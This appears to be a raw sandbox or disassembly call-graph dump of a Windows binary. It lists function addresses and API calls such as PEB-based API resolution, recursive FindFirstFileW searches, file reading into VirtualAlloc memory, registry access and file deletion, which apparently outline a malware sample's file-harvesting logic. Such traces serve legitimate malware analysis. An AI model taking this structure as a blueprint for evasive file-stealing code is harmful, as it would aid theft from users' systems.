404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 FindCloseChangeNotification 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 